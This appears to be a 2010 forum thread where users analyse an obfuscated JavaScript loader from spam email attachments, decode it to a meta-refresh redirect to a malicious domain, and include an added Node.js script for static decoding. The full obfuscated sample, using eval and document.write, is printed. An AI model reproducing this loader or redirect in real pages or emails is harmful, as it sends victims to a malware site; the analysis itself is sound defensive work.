Post by Zath on Sept 21, 2010 1:49:16 GMT -8
I just got 3 or 4 different emails all with an HTML attachment. Getting in the source, I grabbed a JavaScript code from it. It looks very dodgy to me. Is there a site that will tell me what it does rather than just validate the code? I don't want to post it openly here in case someone runs it and has problems. However, if any top JavaScript coders want to look at it, I can PM you the code.
This is at the start of the code and a simple Google search shows it as part of a javascript unpacker. "function aln6(y75t)"
Post by Charles Stover on Sept 21, 2010 3:52:20 GMT -8
Just post it.
And it probably is a virus. Hardly anyone uses HTML attachments, unless they are large companies.
And that's precisely what virus JavaScript would look like - random gibberish to make it hard to tell what it says or does.
Post by Zath on Sept 21, 2010 7:29:52 GMT -8
Ok, here it is. Several emails titled "Email addresses" and a sender's name. The source is the same in all the emails.
I did find that one of the mail boxes used to bounce the email was nobletree.org.
The source is as follows...
<!-- saved from url=(0022)http://internet.e-mail -->
<script language="JavaScript" type="text/javascript">function aln6(y75t){var ojvj="",yuql,sbnj,h9r7,jsy4="c.eq lsoir;p:=\"bm/vhx>0aug-ftn<",jzk6=jsy4.length;eval(unescape("%66un%63ti%6Fn y%79t5%28uo%71l){%6Fjv%6A+=%75oql%7D"));for(h9r7=0;h9r7<y75t.length;h9r7++){sbnj=y75t.charAt(h9r7);yuql=jsy4.indexOf(sbnj);if(yuql>-1){yuql-=(h9r7+1)%jzk6;if(yuql<0){yuql+=jzk6;}yyt5(jsy4.charAt(yuql));}else{yyt5(sbnj);}}eval(unescape("%64oc%75me%6Et.w%72it%65(o%6Avj)%3Boj%76j=%22%22;"));}aln6("cvl.t;-ls>s\"moaq<.t0/cg<=rctlttqcc/ht/.vbuc;p-tq /flfg>qtnnligv0 ae0:0=f.");</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>
Post by Charles Stover on Sept 21, 2010 15:11:01 GMT -8
Decompressed:
function aln6(y75t) {
  var ojvj = "", yuql, sbnj, h9r7,
      jsy4 = "c.eq lsoir;p:=\"bm/vhx>0aug-ftn<",
      jzk6 = jsy4.length;
  function yyt5(uoql) { ojvj += uoql }
  for (h9r7 = 0; h9r7 < y75t.length; h9r7++) {
    sbnj = y75t.charAt(h9r7);
    yuql = jsy4.indexOf(sbnj);
    if (yuql > -1) {
      yuql -= (h9r7 + 1) % jzk6;
      if (yuql < 0) { yuql += jzk6; }
      yyt5(jsy4.charAt(yuql));
    } else {
      yyt5(sbnj);
    }
  }
  document.write(ojvj);
  ojvj = "";
}
aln6("cvl.t;-ls>s\"moaq<.t0/cg<=rctlttqcc/ht/.vbuc;p-tq /flfg>qtnnligv0 ae0:0=f.");
Legitimate names:
function create(str) {
  var output = "",
      str2 = "c.eq lsoir;p:=\"bm/vhx>0aug-ftn<",
      character, position;
  for (var x = 0; x < str.length; x++) {
    character = str.charAt(x);
    position = str2.indexOf(character);
    if (position > -1) {
      position -= (x + 1) % str2.length;
      if (position < 0) position += str2.length;
      output += str2.charAt(position);
    }
    else output += character;
  }
  document.write(output);
  output = "";
}
create("cvl.t;-ls>s\"moaq<.t0/cg<=rctlttqcc/ht/.vbuc;p-tq /flfg>qtnnligv0 ae0:0=f.");
Parsed, you get this:
<meta http-equiv="refresh" content="0;url=http://nobletree.org/x.html" />
Whether or not that page is a virus, I don't care to check.
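Added example, not part of any post in this thread: the same decoding done statically under Node.js, so the redirect target is recovered without opening the attachment or calling eval or document.write. The three constants are copied from the sample posted above; the function names are this example's own.

```javascript
// Added example: static triage under Node.js. Nothing is eval'd or rendered.
// ALPHABET, PACKED and HIDDEN are copied from the sample posted in the thread.
const ALPHABET = 'c.eq lsoir;p:="bm/vhx>0aug-ftn<';
const PACKED =
  'cvl.t;-ls>s"moaq<.t0/cg<=rctlttqcc/ht/.vbuc;p-tq /flfg>qtnnligv0 ae0:0=f.';
const HIDDEN = [
  '%66un%63ti%6Fn y%79t5%28uo%71l){%6Fjv%6A+=%75oql%7D',
  '%64oc%75me%6Et.w%72it%65(o%6Avj)%3Boj%76j=%22%22;',
];

// Undo the position-dependent rotation: the character at index i was shifted
// forward by (i + 1) mod alphabet.length; characters outside the alphabet
// pass through unchanged. Returns the text instead of writing it to a page.
function unpack(packed, alphabet) {
  const n = alphabet.length;
  let out = '';
  for (let i = 0; i < packed.length; i++) {
    const pos = alphabet.indexOf(packed[i]);
    out += pos === -1 ? packed[i] : alphabet[(((pos - (i + 1)) % n) + n) % n];
  }
  return out;
}

// Decode %XX escapes the way unescape() would, without evaluating the result.
function percentDecode(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Pull the target out of a <meta http-equiv="refresh"> tag, or null if absent.
function metaRefreshTarget(html) {
  const tag = /<meta\b[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*>/i.exec(html);
  if (!tag) return null;
  const url = /content\s*=\s*["'][^"']*?url\s*=\s*([^"'>\s]+)/i.exec(tag[0]);
  return url ? url[1] : null;
}

// Defang a URL so it can be pasted into a ticket or forum post safely.
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

function triage() {
  const html = unpack(PACKED, ALPHABET);
  const target = metaRefreshTarget(html);
  return { hidden: HIDDEN.map(percentDecode), html, target: target && defang(target) };
}

console.log(triage());
```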
Post by Todge on Oct 10, 2010 8:32:13 GMT -8
http://nobletree... IS a malicious site, I assume it is 'pretending' to be http://www.nobletree..., which appears to be a legitimate site.